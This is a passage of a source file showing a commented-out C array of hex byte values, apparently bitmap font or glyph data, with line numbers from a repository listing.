// // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 149 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 150 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 151 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 152 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 153 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 154 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 155 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 156 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 157 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 158 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 159 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 160 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 161 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 162 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 163 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 164 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 165 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 166 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 167 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 168 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 169 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 170 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 171 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 172 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 173 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 174 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 175 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 176 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 177 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 178 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 179 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 180 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 181 | // // 0xC0, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 182 | // // 0x80, 0x03, 0x00, 0x00, 0x60, 0x00, 0x80, 0x01, 0x00, 0x03, 0x60, 0x00, 183 | // // 0xC0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 184 | // // 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 185 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 186 | // // 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0xC0, 0x03, 0x60, 0x00, 0xC0, 0x03, 187 | // // 0x00, 0x06, 0xC0, 0x03, 0xC0, 0x00, 0xC0, 0x07, 0x60, 0x00, 0x00, 0x00, 188 | // // 0x00, 0x00, 0x60, 0x00, 0x80, 0x01, 0x60, 0x06, 0xE0, 0x03, 0xC0, 0x03, 189 | // // 0xE0, 0x03, 0xC0, 0x07, 0xE0, 0x03, 0xC0, 0x07, 0xE0, 0x07, 0x60, 0x06, 190 | // // 0x60, 0x06, 0x60, 0x0C, 0x60, 0x06, 0x60, 0x06, 0xE0, 0x07, 0x80, 0x01, 191 | // // 0x80, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x06, 192 | // // 0xE0, 0x03, 0x60, 0x00, 0xC0, 0x07, 0x60, 0x06, 0xE0, 0x03, 0x60, 0x06, 193 | // // 0xE0, 0x03, 0xC0, 0x01, 0x00, 0x03, 0x60, 0x03, 0x80, 0x01, 0xE0, 0x0F, 194 | // // 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x00, 195 | // // 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0x60, 
0x0D, 0xC0, 0x03, 0x60, 0x06, 196 | // // 0x00, 0x03, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 197 | // // 0x00, 0x00, 0xC0, 0x07, 0x60, 0x06, 0x60, 0x00, 0x60, 0x06, 0xE0, 0x07, 198 | // // 0xC0, 0x00, 0xC0, 0x07, 0x60, 0x06, 0x80, 0x01, 0x00, 0x03, 0xE0, 0x01, 199 | // // 0x80, 0x01, 0xE0, 0x0F, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 0x60, 0x06, 200 | // // 0x60, 0x00, 0xC0, 0x03, 0x80, 0x01, 0x60, 0x06, 0x60, 0x06, 0xE0, 0x0F, 201 | // // 0x80, 0x01, 0xC0, 0x07, 0x80, 0x01, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 202 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x06, 0x60, 0x06, 0x60, 0x00, 203 | // // 0x60, 0x06, 0x60, 0x00, 0xC0, 0x00, 0x00, 0x04, 0x60, 0x06, 0x80, 0x01, 204 | // // 0x00, 0x03, 0x60, 0x03, 0x80, 0x01, 0x60, 0x0D, 0x60, 0x06, 0x60, 0x06, 205 | // // 0xE0, 0x03, 0xC0, 0x07, 0x60, 0x00, 0x00, 0x06, 0x80, 0x01, 0x60, 0x06, 206 | // // 0xC0, 0x03, 0xC0, 0x07, 0xC0, 0x03, 0x00, 0x06, 0xC0, 0x00, 0x40, 0x00, 207 | // // 0x80, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x07, 208 | // // 0xE0, 0x03, 0xC0, 0x03, 0xC0, 0x07, 0xC0, 0x03, 0xC0, 0x00, 0xC0, 0x03, 209 | // // 0x60, 0x06, 0xC0, 0x03, 0xE0, 0x01, 0x60, 0x06, 0xC0, 0x03, 0x60, 0x0C, 210 | // // 0x60, 0x06, 0xC0, 0x03, 0x60, 0x00, 0x00, 0x06, 0x60, 0x00, 0xE0, 0x03, 211 | // // 0x00, 0x07, 0xC0, 0x07, 0x80, 0x01, 0xC0, 0x06, 0x60, 0x06, 0xC0, 0x03, 212 | // // 0xE0, 0x07, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 213 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 214 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 215 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 216 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 217 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 218 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 219 | // // 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 220 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 221 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 222 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 223 | // // 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 224 | // // 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 225 | // }; 226 | --------------------------------------------------------------------------------